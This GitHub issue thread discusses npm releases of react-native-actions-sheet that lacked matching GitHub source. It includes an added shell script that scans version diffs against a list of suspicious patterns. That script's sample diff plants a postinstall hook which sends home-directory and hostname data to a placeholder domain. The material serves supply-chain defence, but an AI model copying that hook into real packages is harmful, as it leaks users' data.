ammarahm-ed / react-native-actions-sheet

A cross-platform (Android, iOS & Web) ActionSheet with a flexible API, native performance and zero-dependency code for React Native. Create anything you want inside ActionSheet.
https://rnas.vercel.app
MIT License
1.46k stars, 121 forks

Security concerns with versions 0.9.4+ (USE WITH CAUTION) #379

Closed. goguda closed this 1 month ago

goguda commented 1 month ago

I decided to open a separate issue for this following the discussion at #376 and the observations made by @divineniiquaye.

Basically, the concern arises from the code in this repository not being updated since version 0.9.3, and we're at version 0.9.6 on npm. Hence, code is being released on npm without being updated in this repository.

Just for peace of mind for those who have already upgraded, I had a look at the code in version 0.9.6 shipped by npm and I don't see anything too out of the ordinary. I also used npm diff between versions 0.9.3, 0.9.4, 0.9.5 and 0.9.6 and didn't find anything overly strange. I checked for both fetch calls as well as any weird react native calls that might modify something on the device, but I didn't see anything.

0.9.4 looks like it may have been a mistake, pretty much everything in the dist folder gets deleted. 0.9.5 fixes the mistake by restoring what's in dist and 0.9.6 looks like it completes the migration from FlatList to Shopify's FlashList (which is what introduced the error in #376). These 3 versions were all released on the same day (11 days ago, so July 1st).

Anyone who's already upgraded should be safe, for now.

However, that having been said, I do still find this behaviour a bit alarming considering we're talking 3 revisions now where the code has not been updated on GitHub. There's nothing stopping the author from releasing a 0.9.7 version the same way with something malicious in it.

The way everything gets deleted in 0.9.4 is also a bit strange. Not the most alarming thing, but could be testing the waters for something bigger perhaps?

We're probably going to lock our package version on 0.9.3 and wean our app off of this package just to be safe. Everyone else should probably also take these measures.

I'm hoping @ammarahm-ed, the author of this package, can shed some light on this situation, but the fact they've been dormant on the repository for 3 months while still releasing versions to npm doesn't quite sit well with me.

jonxssc commented 1 month ago

You are totally right, it's strange that the npm package gets updated but the GitHub repository doesn't, although the author is active on his other repositories.

goguda commented 1 month ago

> You are totally right, it's strange that the npm package gets updated but the GitHub repository doesn't, although the author is active on his other repositories.

Another good observation, he was active on GitHub as recently as yesterday...

goguda commented 1 month ago

I'm also noticing the same sort of behaviour in his other package, react-native-mmkv-storage. Latest version on GitHub is 0.9.0 but the version on npm is 0.9.1.

divineniiquaye commented 1 month ago

> I'm also noticing the same sort of behaviour in his other package, react-native-mmkv-storage. Latest version on GitHub is 0.9.0 but the version on npm is 0.9.1.

Woah, this is not looking good. I am dropping react-native-mmkv-storage support from my state management implementation.

goguda commented 1 month ago

> I'm also noticing the same sort of behaviour in his other package, react-native-mmkv-storage. Latest version on GitHub is 0.9.0 but the version on npm is 0.9.1.

> Woah, this is not looking good. I am dropping react-native-mmkv-storage support from my state management implementation.

With react-native-mmkv-storage it looks to be the same sort of pattern, dist/ was deleted in 0.9.0 and re-added in 0.9.1.

ShaunLWM commented 1 month ago

0.9.7 published 5 hours ago :/

npm diff --diff=react-native-actions-sheet@0.9.6 --diff=react-native-actions-sheet@0.9.7

Looks okay. It seems this PR was merged and built: https://github.com/ammarahm-ed/react-native-actions-sheet/pull/385
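The manual review goguda describes in the opening comment (diff the published versions, look for fetch calls and anything that touches the device, notice dist/ being wiped) and the `npm diff` command ShaunLWM ran above can be scripted. The following is an added example written for this page, not code from the thread or from react-native-actions-sheet or its author. It assumes `npm diff` emits git-style unified diffs (`--- a/path` paired with `+++ /dev/null` for a deleted file), treats its pattern list as a heuristic starting point rather than proof of anything, and runs on a constructed, fictional sample diff so it works offline; that sample is not what the real 0.9.3 to 0.9.4 diff contained (the thread found nothing malicious in it).

```shell
#!/bin/sh
# Added example, not code from react-native-actions-sheet or its author.
# Automates the check the thread does by hand: take the output of
#   npm diff --diff=<pkg>@<old> --diff=<pkg>@<new> > versions.diff
# and (a) list files the new version deletes outright (the 0.9.4 "dist/
# got wiped" shape), (b) print added lines that touch the network,
# process execution, dynamic code, base64 blobs or install hooks.
# Assumption: npm diff emits git-style unified diffs ("--- a/path" and
# "+++ /dev/null" for a deleted file). The pattern list is a heuristic
# starting point, not proof of safety or of compromise.

SUSPICIOUS='fetch[(]|XMLHttpRequest|require[(].(child_process|net|dgram|https?|dns).[)]|eval[(]|new Function[(]|base64|atob[(]|postinstall|preinstall'

# Files present in the old version and gone in the new one.
list_deleted_files() {
    awk '
        /^--- a\//            { f = substr($0, 7) }
        /^\+\+\+ \/dev\/null/ { print f }
    ' "$1"
}

# Added ("+") lines matching SUSPICIOUS, prefixed with the file they land in.
flag_risky_additions() {
    awk -v pat="$SUSPICIOUS" '
        /^\+\+\+ /        { f = substr($0, 5); sub(/^b\//, "", f); next }
        /^--- /           { next }
        /^\+/ && $0 ~ pat { print f ": " substr($0, 2) }
    ' "$1"
}

# Number of flagged lines, as a bare integer.
risky_addition_count() {
    flag_risky_additions "$1" | wc -l | tr -d ' '
}

# Constructed sample diff so the script runs offline. It is NOT the real
# 0.9.3 -> 0.9.4 diff; it fabricates the shape of a bad release: dist/
# wiped, an install hook added, and a script that posts host details to a
# placeholder domain (example.invalid is reserved and never resolves).
SAMPLE_DIFF=$(mktemp)
trap 'rm -f "$SAMPLE_DIFF"' EXIT
cat > "$SAMPLE_DIFF" <<'EOF'
diff --git a/dist/index.js b/dist/index.js
deleted file mode 100644
--- a/dist/index.js
+++ /dev/null
@@ -1,2 +0,0 @@
-export { ActionSheet } from './sheet';
-export default ActionSheet;
diff --git a/package.json b/package.json
--- a/package.json
+++ b/package.json
@@ -1,5 +1,6 @@
 {
   "name": "react-native-actions-sheet",
-  "version": "0.9.3",
+  "version": "0.9.4",
+  "scripts": { "postinstall": "node scripts/setup.js" },
   "main": "dist/index.js"
 }
diff --git a/scripts/setup.js b/scripts/setup.js
new file mode 100644
--- /dev/null
+++ b/scripts/setup.js
@@ -0,0 +1,4 @@
+const os = require('os');
+const payload = Buffer.from(process.env.HOME + os.hostname()).toString('base64');
+fetch('https://example.invalid/collect?d=' + payload);
+console.log('setup done');
EOF

echo "== files deleted in the new version =="
list_deleted_files "$SAMPLE_DIFF"
echo "== risky additions ($(risky_addition_count "$SAMPLE_DIFF")) =="
flag_risky_additions "$SAMPLE_DIFF"
```

On the sample the deletion check reports `dist/index.js` and the addition check flags three lines (the `postinstall` hook, the base64 encoding and the `fetch` call). A clean match on this list is not a verdict: it only narrows a version-to-version diff down to the lines worth reading by hand, which is the step the thread was already doing. Pinning the version (as goguda does with 0.9.3) and diffing the npm tarball against the matching GitHub tag remain the stronger controls when the repository and the registry disagree.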

ammarahm-ed commented 1 month ago

Just published a release on github for v0.9.7.

As for why there has been no release: I was caught up in some personal stuff and didn't get the time to finish the release. Docs etc. are fully up to date though. Thanks.